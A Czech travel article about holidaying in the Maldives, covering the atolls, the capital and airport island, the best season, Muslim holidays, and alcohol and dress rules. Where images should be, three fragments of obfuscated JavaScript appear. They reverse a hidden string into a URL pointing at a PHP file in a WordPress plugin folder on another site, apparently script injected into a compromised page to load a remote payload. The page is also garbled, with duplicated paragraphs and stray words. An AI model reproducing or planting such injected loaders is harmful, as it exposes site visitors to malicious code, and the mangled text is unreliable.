FACESTARŽivotní stylABSOLUTNÍ LUXUS A SOUKROMÍ! OBJEVTE S NÁMI POSLEDNÍ RÁJ NA ZEMI!

ABSOLUTNÍ LUXUS A SOUKROMÍ! OBJEVTE S NÁMI POSLEDNÍ RÁJ NA ZEMI!

Není snad cestovatele, který by se někdy nezasnil nad mnohdy až kýčovitě krásnými fotografiemi z tohoto ostrovního ráje. V posledních letech se Maledivy otevřely nejenom turistům, kteří přijíždějí s cestovní kanceláří, ale i nezávislým dovolenkářům, kteří se vydávají poznat jednotlivé ostrovy na vlastní pěst.

Není snad cestovatele, který by se někdy nezasnil nad mnohdy až kýčovitě krásnými fotografiemi z tohoto ostrovního ráje. V posledních letech se Maledivy otevřely nejenom turistům, kteří přijíždějí s cestovní kanceláří, ale i nezávislým dovolenkářům, kteří se vydávají poznat jednotlivé ostrovy na vlastní pěst.

Maledivy zblízka

Maledivy jsou tvořeny 19ti korálovými atoly a tento ostrovní stát najdeme v Indickém oceánu, jihozápadně od břehů Indie. Pokud spočítáme všechny ostrovy, dostaneme se k číslu okolo 1196, přičemž necelých 200 ostrovů je obydleno. Zajímavostí jistě je, že žádné místo na Maledivách neleží přirozeně nad 2,5m nad hladinou oceánu. Každý z ostrovů má svůj domácí korálový útes a lagunu, což je chrání před větrem a okolními vlivy oceánu. Nejvíce obyvatel, více než sto tisíc, žije v hlavním městě Male, které se prakticky celé rozprostírá na stejnojmenném ostrově. Vedlejší ostrov se jmenuje Hulhumale a nachází se na něm místní mezinárodní letiště. Jedná se o jedno z nejzajímavějších letišť na světě, co se týče přistávací plochy. Doporučuji si proto rezervovat místa v letadle u okýnek. Ostrov je prakticky celý uměle vybudován a staví se na něm nové, moderní město s kompletní infrastrukturou a nespočtem pensionů a hotelů. Ostrov se stal zároveň druhým výchozím bodem při cestování po Maledivách.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandooma20Resort.jpg“ />

Kdy se vydat do ráje?

Jistě přemýšlíte nad tím, kdy je vhodná doba k návštěvě tohoto ostrovního ráje. Jednoduše se dá odpovědět, že se na Maledivy můžete vydat po celý rok. Nejvhodnější dobou je ale období našich zimních měsíců, od prosince do konce února. V tuto dobu zde panuje zároveň nejvyšší sezóna, a proto doporučuji rezervovat si svůj vyhlédnutý hotel či resort s dostatečným předstihem. Není tajemstvím, že na ostrovy přilétají cestovatelé z celého světa a kapacita některých hotelů a penzionů bývá na Maledivách omezena. Během našeho léta se na ostrovy nedoporučuje létat z důvodu panujících období dešťů. Někdy vás však může počasí překvapit a vy si tak užijete slunečnou dovolenou bez větších přeháněk i v létě. Jindy vás naopak může potkat pár dní dešťů i během hlavní sezóny v zimních měsících. S největší pravděpodobností budete mít ale pěkné počasí po celý rok, a pokud se bude blížit déšť nebo bouřky, bude tomu tak přes noc, nebo chvilku přes den, kdy se poté nebe po dešti opět vyjasní. Teploty očekávejte přes den mezi 25 – 29 stupni Celsia. Za nejteplejší měsíce se udávají březen a duben, kdy se denní maxima mohou pohybovat až okolo 34 stupňů Celsia.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand.jpg“ />

Sledujte pohyblivé svátky

Vhodnou dobu dovolené na Maledivách ovlivňují i místní státní a náboženské svátky. Nejrozšířenějším náboženstvím je zde Islám,  proto se setkáte s řadou muslimských svátků. Vzhledem k tomu, že je většina svátků pohyblivá, doporučuji si vždy dopředu zjistit, na jaké dny dané svátky připadají. Asi nejdůležitějším svátkem pro místní i turisty je Ramadán, který připadá na konec září až začátek října a trvá po dobu 28 dní. Během této doby není dovoleno konzumovat potraviny a kouřit na veřejnosti.

and

Na nudismum zapomeňte

Jak jsem již zmínila, Maledivy jsou muslimskou zemí, a proto je zde zakázáno dovážet a pít alkohol. Tomuto zákazu se vyhnete, pokud pojedete do některého z resortů, kde je pití alkoholu pro turisty povoleno. Dále myslete na to, že v rámci všech ostrovů je zcela zakázán nudismus. Ženy se v plavkách mohou koupat pouze v  hotelových resortech. Pokud se vydáte na Maledivy individuálně a vyberete si pro svůj pobyt některý z obydlených místních ostrovů, bývá již zvykem, že i zde mají místní hotely přichystanou pláž pro turisty, kde se mohou ženy koupat v plavkách. Kdekoliv jinde, na veřejných plážích, je třeba, aby měla žena přes plavky minimálně tuniku, případně kraťasy a tričko. Stejně tak pokud se vydáte do hlavního města, nebo budete ubytováni na obydlených ostrovech, doporučuje se ženám nemít příliš odhalené nohy a poprsí. Pokud vás dovolená na Maledivách láká a rádi byste do tohoto ráje zavítali, dozvíte se již v příštím díle, jak si naplánovat cestu – levně i luxusně, přes cestovní kancelář nebo individuálně na vlastní pěst.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand2.jpg“ />

Krásnou dovolenou přeje Vaše dovolenkářka. Blog dovolenkářky se skvělými radami na cestování naleznete na www.dovolenkarka.cz

Další díl: Naplánujte si vaší dovolenou na Maledivách – levně i luxusně!

and

Související články